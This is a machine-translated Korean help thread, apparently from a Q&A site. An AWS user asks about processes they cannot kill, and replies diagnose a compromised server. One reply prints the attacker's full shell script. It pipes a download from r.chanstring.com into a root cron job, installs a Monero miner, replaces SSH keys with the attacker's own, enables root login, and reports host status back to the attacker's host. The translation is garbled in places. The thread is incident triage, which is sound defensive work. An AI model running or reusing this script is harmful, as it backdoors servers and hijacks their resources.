aws와 지난 며칠간 불필요한 스크립트가 실행되는 것을보고 있습니다. 다음은 첨부 된 스크린 샷입니다.AWS 불필요한 스크립트
나는 sudo kill -9 {pId}에 의해 그 프로세스를 죽이려했으나 그렇게 할 수 없었다.
aws와 지난 며칠간 불필요한 스크립트가 실행되는 것을보고 있습니다. 다음은 첨부 된 스크린 샷입니다.AWS 불필요한 스크립트
나는 sudo kill -9 {pId}에 의해 그 프로세스를 죽이려했으나 그렇게 할 수 없었다.
귀하의 상자가 손상있어 모든 suggesstion.
그것은 서버에 스크립트를 다운로드하고 당신이 모든 SSH 키를 삭제하고 공격자가 로그인 할 수있는 새로운 하나를 만들어 볼 수 있듯이 그것을
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/2 * * * * curl -L https://r.chanstring.com/api/report?pm=1 | sh" > /var/spool/cron/root
echo "*/2 * * * * ps auxf | grep -v grep | grep yam || nohup /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr &" >> /var/spool/cron/root
# echo "*/2 * * * * ps auxf | grep -v grep | grep gg2lady || nohup /opt/gg2lady &" >> /var/spool/cron/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/opt/yam/yam" ]; then
mkdir -p /opt/yam
curl -f -L https://r.chanstring.com/api/download/yam -o /opt/yam/yam
chmod +x /opt/yam/yam
# /opt/yam/yam -c x -M stratum+tcp://46fbJKYJRa4Uhvydj1ZdkfEo6t8PYs7gGFy7myJK7tKDHmrRkb8ECSXjQRL1PkZ3MAXpJnP77RMBV6WBRpbQtQgAMQE8Coo:[email protected]:6666/xmr
fi
# if [ ! -f "/opt/gg2lady" ]; then
# curl -f -L https://r.chanstring.com/api/download/gg2lady_`uname -i` -o /opt/gg2lady
# chmod +x /opt/gg2lady
# fi
pkill gg2lady
yam=$(ps auxf | grep yam | grep -v grep | wc -l)
gg2lady=$(ps auxf | grep gg2lady | grep -v grep | wc -l)
cpu=$(cat /proc/cpuinfo | grep processor | wc -l)
curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=`uname -i`
를 실행합니다. 스크립트의 끝에서
그것은 그것의 상태를보고 curl https://r.chanstring.com/api/report?yam=$yam\&cpu=$cpu\&gg2lady=$gg2lady\&arch=
UNAME -i`
그들은 모두 내가
편집 생각 한 번에 서버를 손상 보일 수 있도록 다시 서버 : 도메인 인을 파나마에 등록했다. 우ie. 나는 당신이 당신의 서버를 점검하고 그것의 보안과 관련하여 조언을 받아야한다고 생각한다.
당신 말이 맞아요. 그래서 내가 무엇을해야하니? 그들이 어떻게 그렇게 했습니까? –
당신의 서버에서 이것을 얻기 위해 사용했던 것을 말할 수는 없지만, 백도어가 설치된 어떤 서비스이거나 시스템 자체에 취약점이 있습니다 – KRONWALLED
어떻게 멈추게합니까? 어떤 아이디어? 또는 어디에서 설치 했습니까? –
SSH 키를 사용하고 있지 않습니까? –